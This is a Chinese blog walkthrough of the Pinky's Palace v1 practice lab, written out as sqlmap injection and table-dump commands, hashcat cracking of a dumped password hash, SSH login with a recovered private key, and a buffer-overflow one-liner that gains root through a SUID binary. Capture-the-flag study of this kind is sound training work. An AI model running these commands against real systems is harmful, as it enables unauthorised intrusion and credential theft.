OSCP练习:vulhub靶机pinkys-palace-v1

最新推荐文章于 2023-09-23 21:31:57 发布
最新推荐文章于 2023-09-23 21:31:57 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: OSCP练习 文章标签: linux web安全 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47311099/article/details/127536716
版权

nmap -sC -sV 192.168.210.116
发现8080,但是403,31337端口是http代理 ,64666为ssh
在这里插入图片描述

直接访问403,配置代理,访问127.0.0.1:8080
在这里插入图片描述

在这里插入图片描述

dirb [http://127.0.0.1:8080](http://127.0.0.1:8080) /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -p [http://192.168.210.116:31337](http://192.168.210.116:31337)
在这里插入图片描述
发现:http://127.0.0.1:8080/littlesecrets-main/
在这里插入图片描述

这个长得就像个sql注入…,sqlmap跑一跑
sqlmap -u "[http://127.0.0.1:8080/littlesecrets-main/login.php"](http://127.0.0.1:8080/littlesecrets-main/login.php") --proxy="http://192.168.210.116:31337" --level=3 --data="user=admin&pass=admin" --current-db --batch
库名为pinky_sec_db
在这里插入图片描述

sqlmap -u "[http://127.0.0.1:8080/littlesecrets-main/login.php"](http://127.0.0.1:8080/littlesecrets-main/login.php") --proxy="http://192.168.210.116:31337" --level=3 --data="user=admin&pass=admin" -D pinky_sec_db --tables --batch
表名为users、logs
在这里插入图片描述

段为user、pass、uid
在这里插入图片描述

sqlmap -u "[http://127.0.0.1:8080/littlesecrets-main/login.php"](http://127.0.0.1:8080/littlesecrets-main/login.php") --proxy="http://192.168.210.116:31337" --level=3 --data="user=admin&pass=admin" -D pinky_sec_db -T users -C uid,user,pass --dump --batch
在这里插入图片描述

密码看着MD5加密,hashcat爆一下
hashcat -a 0 -m 0 d60dffed7cc0d87e1f4a11aa06ca73af /usr/share/wordlists/rockyou.txt --force
在这里插入图片描述

账密为pinkymanage/3pinkysaf33pinkysaf3,ssh登录
在这里插入图片描述

在/var/www/html/littlesecrets-main/ultrasecretadminf1l35 发现rsa密钥.ultrasecret
在这里插入图片描述

在这里插入图片描述

进行bash64编码转换,给600权限
在这里插入图片描述

ssh私钥登录pinky账号
在这里插入图片描述

发现suid权限程序
在这里插入图片描述

执行后没有反应,加上一点参数发现会进行输出,但执行不了命令
在这里插入图片描述

尝试缓冲区溢出,输入废字符, 得到边界值为72
在这里插入图片描述

二进制文件没看懂搜了一下poc
./adminhelper $(python -c "print 'a' * 72 + '\xd0\x47\x55\x55\x55\x55'")
提权成功拿到flag
在这里插入图片描述

Forest深林
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
小白的靶机VulnHub-Pinky‘s Palace: v3
wo41ge的博客
02-19 1万+
靶机地址:https://www.vulnhub.com/entry/pinkys-palace-v3,237/ 开机界面 就是这样 确定了靶机的IP地址:192.168.106.150 靶机开放了21、5555、8000端口 一个一个来 21端口 ftp服务可以匿名访问 5555端口有ssh服务 8000端口有http服务 运行了Drupal 打开康康 让我们尽量不要使用metasploit工具 kali上ftp匿名登录 去底层 康康 匿名登录 就是 账号:ftp 密码:空 这边遇到一个问题
红队打靶练习:PINKY‘S PALACE: V1
最新发布
分享
12-15 594
红队打靶练习:PINKY'S PALACE: V1,犹如毒蝎猛刺般的绝望感.....
No.26-VulnHub-Pinky's Palace: v1-Walkthrough渗透学习
qq_34801745的博客
01-22 2227
** VulnHub-pWnOS: 1.0-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/pwnos-10,33/ 靶机难度:初级(CTF) 靶机发布日期:2008年6月27日 靶机描述:你们中有些人可能已经注意到了这个新的pWnOS论坛部分。我创建了pWnOS作为虚拟机,Grendel很好,可以在这里发布它。这是有关pWnOS的一些信息。 这...
OSCP - 6Days_Lab-v1.0.1靶机
小小猪的博客
06-09 361
OSCP - 6Days_Lab-v1.0.1靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.232 访问 http://x.x.x.232 输入折扣码,提示代码过期,没啥用处 查看页面源码 访问,得到出错,可能存在ssrf 修改src=后边参数为index.php,并没有拦截,也没有报错 使用dirb http://x.x.x.232,获取靶机网站目录结构文件 打开BP进行抓包,发现响应包是主页界面,访.
【oscp系列-Tr0ll-1】靶机4
weixin_44807430的博客
01-16 479
知行合一
Hack-the-Box-OSCP-Preparation:Hack-the-Box-OSCP-Preparation
03-20
在花了将近八个月的时间,攻读了Offensive Security Certified Professional(OSCP)认证后,我很高兴地宣布我已获得OSCP官方认证!我准备的主要资源是下图所示的。当我浏览机器时,我写了关于如何解决上每个盒子的...
javasnmp源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-04
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
java红酒网站源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-05
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
1-OSCP自学笔记-October靶机练习1
08-04
【OSCP自学笔记-October靶机练习1】这篇教程主要介绍了如何通过渗透测试技术攻破一个名为"October"的靶机靶机来自于Vulnhub平台,作者选择了10台典型的靶机作为OSCP(Offensive Security Certified Professional)...
java红酒网站源码-OSCP-Survival:OSCP-生存
06-05
java网站源码OSCP-生存 这是一个克隆 这也可以查看 OSCP-生存指南 注意:本文档将目标 ip 称为导出变量 $ip。 要在命令行上设置此值,请使用以下语法: 出口ip=192.168.1.100 目录 卡利Linux 将目标 IP 地址设置为$...
【甄选靶场】Vulnhub百个项目渗透——项目二十七:Pinkys-Palace-2(LFI,端口敲震,ssh爆破,64位缓冲区溢出)
人间体佐菲的博客
09-30 903
【甄选靶场】Vulnhub百个项目渗透——项目二十七:Pinkys-Palace-2(LFI,端口敲震,ssh爆破,64位缓冲区溢出)网络安全渗透测试
Vulnhub靶机练习Pinky‘s-Place v3
WhiteCatNya的博客
01-17 277
Pinky's-Place v3练习
【甄选靶场】Vulnhub百个项目渗透——项目三十六:PinkysPalace-v3(隧道搭建,内网穿透,登录爆破,格式化字符串缓冲区溢出漏洞,insmod提权)
人间体佐菲的博客
10-10 930
【甄选靶场】Vulnhub百个项目渗透——项目三十六:PinkysPalace-v3(隧道搭建,内网穿透,登录爆破,格式化字符串缓冲区溢出漏洞,insmod提权)
No.27-VulnHub-Pinky's Palace: v2-Walkthrough渗透学习
qq_34801745的博客
01-23 2079
** VulnHub-Pinky’s Palace: v2-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/pinkys-palace-v2,229/ 靶机难度:中级(CTF) 靶机发布日期:2018年3月18日 靶机描述:一个现实的Boot2Root。获得对系统的访问权限并阅读/root/root.txt 进入难度:容易/中级 扎根困难:中级/...
No.36-VulnHub-Pinky's Palace: v3-Walkthrough渗透学习
qq_34801745的博客
01-30 1418
** VulnHub-Pinky’s Palace: v3-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/pinkys-palace-v3,237/ 靶机难度:中级(CTF) 靶机发布日期:2018年5月15日 靶机描述: 无???!!!。 目标:得到root权限&找到flag.txt 作者:大余 时间:2020-01-29 请注意:对...
Vulhub靶场
blalaa的博客
09-05 1719
【Django JSONField/HStoreField SQL 注入漏洞 】 ①原理 Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。 在Django中支持Postgresql的数据类型:JSONField、HStoreField、Arr
3、靶场——Pinkys-Place v3(3)
qq_55202378的博客
09-23 160
Pinky-Place vulhub
vulhub漏洞复现66_Spring
weixin_44193247的博客
02-13 1036
vulhub漏洞复现练习
vulhub】fastjson反序列化漏洞验证POC
qq_45300786的博客
07-10 3264
盲打payload: 1.2.67版本前 {"zeo":{"@type":"java.net.Inet4Address","val":"fatu5k.dnslog.cn"}} 1.2.67版本后payload {"@type":"java.net.Inet4Address","val":"dnslog"} {"@type":"java.net.Inet6Address","val":"dnslog"} 这里我是fastjson1.2.24版本 先获取一个dnslog 抓包,然后加上我们的payloa
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全和网络渗透感兴趣的读者来说是一个很有价值的参考资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Forest深林

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值